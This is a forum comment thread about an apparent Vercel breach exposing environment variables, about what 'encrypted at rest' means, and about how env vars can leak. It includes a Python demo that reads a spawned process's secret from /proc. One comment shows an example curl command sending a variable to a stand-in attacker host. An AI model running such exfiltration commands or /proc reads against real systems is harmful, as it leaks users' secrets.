Comment by trick-or-treat
16 hours ago
I think it's clear that some customers env vars got exposed, so that can only mean unencrypted, right?
They said "encrypted at rest", which they almost certainly are.
If you spin up an EC2 instance with an ftp server and check the "Encrypt my EBS volume" checkbox, all those files are 'encrypted at rest', but if your ftp password is 'admin/admin', your files will be exposed in plaintext quite quickly.
Vercel's backend is of course able to decrypt them too (or else it couldn't run your app for you), and so the attacker was able to view them, and presumably some other control on the backend made it so the sensitive ones can end up in your app, but can't be seen in whatever employee-only interface the attacker was viewing.
Hmm, that's confusing. So they're eventually encrypted but plain-text at some point? Doesn't sound good TBH.
How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.
What's best practice to handle env vars? How do people handle them "securely" without it just being security theater? What tools and workflows are people using?
If a company says “encrypted at rest” that is generally compliance-speak for “not encrypted, but the hard drive partition is encrypted”.
Various certifications require this, I guess because they were written before hyper scalers and the assumed attack vector was that someone would literally steal a hard drive.
A running machine is not "at rest": just as you can read files on your encrypted Mac HDD, the running program has decrypted access to the hard drive.
There isn't really a way around it.
Env vars are not secure. Anything that has root access can see all env vars of all applications via /proc.
(And modern Linux is unusable without root access, thanks to Docker and other fast-and-loose approaches.)
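An added example (not posted by any commenter) that makes the /proc point above concrete on Linux: it spawns a child with a constructed secret in its environment, has the child delete the variable from its own os.environ, and shows that /proc/<pid>/environ still reveals the value, because unsetenv() only unlinks a pointer from the environ array and never overwrites the exec-time string block. The DEMO_SECRET name and its value are made up for the demo.

```python
import os
import subprocess
import sys


def read_proc_environ(pid):
    """Parse /proc/<pid>/environ into a dict.

    The file is the NUL-separated block the kernel copied onto the process's
    stack at exec time. Root can read it for any dumpable process; a normal
    user can read it for processes running under their own uid.
    """
    with open(f"/proc/{pid}/environ", "rb") as f:
        raw = f.read()
    env = {}
    for entry in raw.split(b"\0"):
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env


# Constructed child program: it scrubs the variable from its own environment,
# reports what it now sees, then idles so the parent can inspect it via /proc.
CHILD_PROGRAM = (
    "import os, sys, time\n"
    "os.environ.pop('DEMO_SECRET')\n"
    "sys.stdout.write(os.environ.get('DEMO_SECRET', '<gone>') + '\\n')\n"
    "sys.stdout.flush()\n"
    "time.sleep(60)\n"
)


def spawn_and_inspect(secret="hunter2-constructed"):
    """Return (child's own view after unsetenv, value still visible via /proc).

    Returns None where /proc is unavailable (non-Linux). A secret read from a
    0600 file at startup never appears here at all, although it still lives
    in process memory, which root can also read.
    """
    if not os.path.exists("/proc/self/environ"):
        return None
    child = subprocess.Popen(
        [sys.executable, "-c", CHILD_PROGRAM],
        env={"DEMO_SECRET": secret, "PATH": os.environ.get("PATH", "")},
        stdout=subprocess.PIPE,
    )
    try:
        child_view = child.stdout.readline().decode().strip()  # "<gone>"
        proc_view = read_proc_environ(child.pid).get("DEMO_SECRET")
    finally:
        child.kill()
        child.wait()
    return child_view, proc_view
```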
It seems only "encrypt and throw away the key" would be the acceptable strategy.